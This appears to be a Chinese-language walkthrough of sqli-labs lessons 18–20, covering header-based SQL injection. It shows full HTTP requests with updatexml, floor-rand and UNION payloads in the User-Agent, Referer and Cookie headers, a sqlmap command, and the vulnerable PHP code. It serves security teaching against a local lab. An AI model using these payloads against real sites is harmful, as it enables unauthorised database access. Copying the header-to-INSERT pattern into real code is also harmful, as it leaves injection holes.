標籤:
這幾關的注入點產生位置大多在HTTP頭位置處
常見的HTTP注入點產生位置為【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】;
1)工具用法:
注入點在user-agent處,所以使用sqlmap -r參數就可以了,將請求的測試資料包儲存成1.txt,然後在user-agent欄位處加個*號。然後輸入下列命令就可以使用工具注入
測試資料包 1.txt
POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.phpConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 38 uname=admin&passwd=admin&submit=Submit
2)手工注入
前面的欄位前篇一律,只要有錯誤回顯得話,匹配好單引號可以直接使用updatexml爆錯語句驗證注入點;
POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0‘ and updatexml(1,concat(0x7e,database()),1) and ‘11‘=‘11Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.phpConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 38 uname=admin&passwd=admin&submit=Submit
3)注入點產生代碼
//檢查值是否為空白,不為空白使用mysql_real_escape_string函數對輸入的值進行過濾function check_input($value) { if (!empty($value)) { // truncation (see comments) $value = substr($value, 0, 20); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not a number if (!ctype_digit($value)) { $value = "‘".mysql_real_escape_string($value)."‘"; } else { $value = intval($value); } return $value;}$uagent = $_SERVER[‘HTTP_USER_AGENT‘];$IP = $_SERVER[‘REMOTE_ADDR‘];echo "<br>";echo ‘Your IP ADDRESS is: ‘.$IP;echo "<br>";//echo ‘Your User Agent is: ‘ .$uagent;// take the variablesif (isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) { $uname = check_input($_POST[‘uname‘]); $passwd = check_input($_POST[‘passwd‘]); //logging the connection parameters to a file for analysis. $fp = fopen(‘result.txt‘, ‘a‘); fwrite($fp, ‘User Agent:‘.$uname."\n"); fclose($fp); $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if ($row1) { echo ‘<font color= "#FFFF00" font size = 3 >‘; $insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (‘$uagent‘, ‘$IP‘, $uname)"; //注入點產生位置 mysql_query($insert);
-Less-19 Header Injection- Referer- Error Based- string
這一關的注入點產生在referer處,主要為用insert語句寫入時未判斷。。
Referer:‘ AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x717a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘qmQA‘=‘qmQA
Playload
所使用的注入語句
完整的HTTP請求包
POST /sqli-labs-master/Less-19/ HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/sqli-labs-master/Less-19/‘ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1‘=‘1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 38uname=admin&passwd=admin&submit=Submit
核心代碼
function check_input($value) { if (!empty($value)) { // truncation (see comments) $value = substr($value, 0, 20); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not a number if (!ctype_digit($value)) { $value = "‘".mysql_real_escape_string($value)."‘"; } else { $value = intval($value); } return $value;}$uagent = $_SERVER[‘HTTP_REFERER‘];$IP = $_SERVER[‘REMOTE_ADDR‘];echo "<br>";echo ‘Your IP ADDRESS is: ‘.$IP;echo "<br>";//echo ‘Your User Agent is: ‘ .$uagent;// take the variablesif (isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) { $uname = check_input($_POST[‘uname‘]); $passwd = check_input($_POST[‘passwd‘]); $fp = fopen(‘result.txt‘, ‘a‘); fwrite($fp, ‘Referer:‘.$uname."\n"); fclose($fp); $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if ($row1) { echo ‘<font color= "#FFFF00" font size = 3 >‘; $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (‘$uagent‘, ‘$IP‘)"; //注入點產生處 mysql_query($insert);
-Less-20 Cookie Injection- Error Based- string
Playload
Cookie:Dumb-4829‘ UNION ALL SELECT NULL,CONCAT(0x7170786271,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7176706271),NULL-- -
核心代碼
1、接收使用者名稱,密碼;2、如果正確,設定使用者名稱作為cookies值3、查詢資料庫中有沒有相關的使用者名稱等於cookies名144-147行代碼$cookee = base64_decode($cookee);echo "<br></font>";$sql="SELECT * FROM users WHERE username=(‘$cookee‘) LIMIT 0,1";$result=mysql_query($sql);...188-189代碼echo " Your Cookie is deleted";setcookie(‘uname‘, base64_encode($row1[‘username‘]), time()-3600);
【Mysql sql inject】【入門篇】sqli-labs使用 part 4【18-20】
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
